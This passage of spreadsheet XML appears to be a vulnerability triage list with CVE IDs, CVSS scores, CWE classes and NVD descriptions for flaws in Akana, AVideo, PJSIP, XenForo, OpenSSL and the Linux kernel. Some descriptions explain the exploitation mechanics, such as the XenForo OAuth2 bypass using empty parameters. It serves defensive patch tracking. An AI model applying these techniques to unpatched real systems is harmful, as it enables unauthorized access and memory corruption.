          <t>A flaw resulting in XML external entity (XXE) was found in Akana API Platform in which references were improperly restricted during XML-to-JSON processing. The issue affects Akana versions 2026.1, 2025.1.1, and all versions before 2024.1.6 (including older unsupported versions of Akana) and has been fixed as a security patch in the latest release of supported versions.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89212</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89243</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in UserGroups::setGroup_name() that fails to sanitize group_name input. Administrators with canAdminUserGroups permission can inject malicious HTML and JavaScript that executes in the browser when other administrators access the user manager interface.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89243</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90456</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>An example environment-configuration file for a bundled inventory-management component ships with a fixed, publicly-known administrative password. A deployment that copies this example file into active configuration without running the setup routine that regenerates credentials will expose that component's administrative interface to anyone aware of the default value.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90456</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57162</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit a1b707c, a stack buffer overflow exists in the SRTP/SDES media transport when processing a=crypto attributes during SDP offer/answer (sdes_encode_sdp() in transport_srtp_sdes.c). This affects applications with SRTP enabled (use_srtp optional or mandatory, using SDES keying). During media negotiation, the crypto attributes from the remote SDP are collected into a fixed-size array without bounding their number; a remote peer that includes an excessive number of a=crypto attributes in a single media description can write past the end of that array on the stack. This is reachable from an incoming SIP INVITE during offer/answer, before application-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. Applications that do not enable SRTP are not affected. This issue has been patched via commit a1b707c.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57162</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57163</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit c4a151a, a stack buffer overflow exists in the GnuTLS TLS backend when parsing the Subject Alternative Name extension of a peer certificate (tls_cert_get_info() in ssl_sock_gtls.c). Only GnuTLS builds are affected (--with-gnutls); OpenSSL and Apple SecureTransport/Network.framework builds are not affected. While extracting certificate information after a TLS handshake, an incorrect buffer-size value can cause an oversized SubjectAltName entry to be written past the end of a fixed-size stack buffer. A network-positioned attacker presenting a crafted certificate — a malicious server to a connecting client, or a malicious client to a server that requests certificates — can trigger this during the TLS handshake, before any SIP-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. This issue has been patched via commit c4a151a.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57163</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75803</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>Issue summary: ChaCha20-Poly1305 and AES-OCB decryption with an empty
ciphertext can report success without verifying the supplied authentication
tag when the operation is finalized by calling the EVP_Cipher() function.
Impact summary: Applications calling EVP_Cipher() on an empty ciphertext and
expecting the call to check the AEAD tag may accept forged messages.
CWE: CWE-354 (Improper Validation of Integrity Check Value)
Description: The EVP_Cipher() API call for AEAD ciphers behaves like a one
shot encryption and decryption call. It also verifies the AEAD tag after the
decryption operation. However for AES-OCB and ChaCha20-Poly1305 ciphers
it skipped the AEAD tag verification when an empty ciphertext was passed to
the function. The callers of this function might believe that a successful
return indicates a valid AEAD tag for these ciphers, even when that has not
truly been validated in this case.
FIPS impact: no
The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this CVE
as the affected algorithms are not FIPS approved and thus not implemented
in the FIPS module.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75803</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80945</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: iaa - unmap dst before software fallback on decompress
On a hardware analytics error, decompress retries through the software
fallback, which writes req-&gt;dst with the CPU while it is still mapped
DMA_FROM_DEVICE. With SWIOTLB active the later dma_unmap_sg() copies the
stale bounce buffer over req-&gt;dst, corrupting the result.
Unmap before the fallback runs. The async path unmaps inline; the sync
path signals the retry with -EAGAIN so iaa_comp_adecompress() runs the
fallback after unmapping.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80945</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89532</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Fix pcl_for_each_segment for empty chunks
When a parsed chunk list contains a chunk whose ch_segcount is zero,
pcl_for_each_segment computes its inclusive upper bound as
&amp;chunk-&gt;ch_segments[ch_segcount - 1]. ch_segcount is u32, so the
subtraction wraps to 0xFFFFFFFF and the bound lands far past the
ch_segments flex array. The loop body then walks unrelated memory at
sizeof(struct svc_rdma_segment) stride until it faults.
A zero-segcount chunk is reachable from the wire:
xdr_check_write_chunk() only rejects segcount values greater than
rc_maxpages, and pcl_alloc_write() links a freshly allocated chunk
onto rc_write_pcl/rc_reply_pcl before its segment-fill loop runs,
so a Write or Reply chunk advertising zero segments leaves
ch_segcount == 0 on the list. When the transport has negotiated
Send-With-Invalidate, svc_rdma_get_inv_rkey() iterates all four
PCLs with pcl_for_each_segment and dereferences segment-&gt;rs_handle
on each iteration, turning the underflow into an out-of-bounds read
and a general protection fault.
    xdr_check_write_list / xdr_check_reply_chunk
      pcl_alloc_write()
        chunk = pcl_alloc_chunk(...)  /* ch_segcount = 0 */
        list_add_tail(&amp;chunk-&gt;ch_list, &amp;pcl-&gt;cl_chunks)
        /* fill loop iterates zero times for wire segcount 0 */
    svc_rdma_get_inv_rkey()
      pcl_for_each_chunk(rc_write_pcl)
        pcl_for_each_segment(segment, chunk)
          pos &lt;= &amp;ch_segments[0u - 1u]  /* 0xFFFFFFFF */
          segment-&gt;rs_handle            /* OOB read -&gt; GPF */
Fix by switching the macro to a half-open upper bound that uses
ch_segcount directly. For ch_segcount == 0 the loop start equals the
loop end and the body is skipped; for ch_segcount &gt; 0 the iteration
range is unchanged. All six existing call sites in
net/sunrpc/xprtrdma/svc_rdma_recvfrom.c and
net/sunrpc/xprtrdma/svc_rdma_rw.c remain correct under the new bound,
so no caller changes are needed.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89532</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89537</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Reject short RFC 4121 MIC tokens in gss_krb5_verify_mic_v2
gss_krb5_verify_mic_v2() reads the token ID at ptr[0..1], the flags
byte at ptr[2], and padding at ptr[3..7], then passes
ptr + GSS_KRB5_TOK_HDR_LEN and cksum_len to gss_krb5_mic_build_sg().
None of these accesses check read_token-&gt;len first.
The minimum safe token size is GSS_KRB5_TOK_HDR_LEN (16) plus
ctx-&gt;krb5e-&gt;cksum_len (12-24, depending on the enctype).  All callers
accept shorter tokens from the wire:
 - gss_unwrap_resp_integ() enforces only an upper bound
   (offset + len &lt;= rcv_buf-&gt;len) before allocating
   mic.data = kmalloc(len) and passing it to gss_verify_mic().
   A malicious NFS server can therefore supply a short checksum
   opaque, producing a small slab allocation that the Kerberos MIC
   verifier reads past.
 - gss_validate() enforces only len &lt;= RPC_MAX_AUTH_SIZE (400)
   before passing the wire-supplied length to
   gss_validate_seqno_mic(), which constructs a mic xdr_netobj
   and calls gss_verify_mic().
 - svcauth_gss_verify_header() enforces only
   checksum.len &gt;= XDR_UNIT (4 bytes) before dispatching to
   gss_verify_mic().
 - svcauth_gss_unwrap_integ() checks only that the checksum fits
   in gsd-&gt;gsd_scratch.
Add a length guard at the top of gss_krb5_verify_mic_v2(), before any
ptr[] access or scatterlist construction.  Well-formed MIC tokens from
gss_krb5_get_mic_v2() already have exactly GSS_KRB5_TOK_HDR_LEN +
cksum_len bytes, so valid traffic is unaffected.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89537</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89630</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: restore the data_offset bound in is_valid_oplock_break()
Commit 83bfbd0bb902 ("cifs: Remove the RFC1002 header from smb_hdr")
changed the quantity this bound is measured against.  It used to be
srv-&gt;total_read minus the 4-byte RFC1002 preamble that total_read then
included, so it was the SMB message length.  The same commit stopped
counting the preamble, and the mechanical substitution to
srv-&gt;total_read - srv-&gt;pdu_size left an expression that is identically
zero: standard_receive3() reads MID_HEADER_SIZE() bytes and then exactly
pdu_length - MID_HEADER_SIZE() more, adding both to total_read.
len is therefore 0, the subtraction below it wraps, and no __u32
DataOffset can exceed the result, so the check from commit 097f5863b1a0
("cifs: read overflow in is_valid_oplock_break()") no longer rejects
anything.  Use total_read, which is now the message length on its own.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89630</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89631</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject a tree connect response whose byte count is too small
CIFSTCon() bounds its strnlen() over the byte area with the server's
ByteCount minus two, which for ByteCount 0 or 1 goes negative as an int
and converts to a huge size_t.  The later subtraction wraps the __u16
bytes_left, and that is what bounds cifs_strndup_from_utf16(): a bound of
up to 65535 against a ~16 KB cifs_req_poolp object runs off the end of the
slab object, and the bytes reach userspace through tcon-&gt;nativeFileSystem
in /proc/fs/cifs/DebugData.
Reject a byte area too small for what the parser consumes.  Two bytes is
the least it can consume, and no conformant response carries fewer.  The
new trace point is the 129th smb_eio_trace entry, which __mode(byte)
cannot represent, so the attribute goes with it.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89631</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89634</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
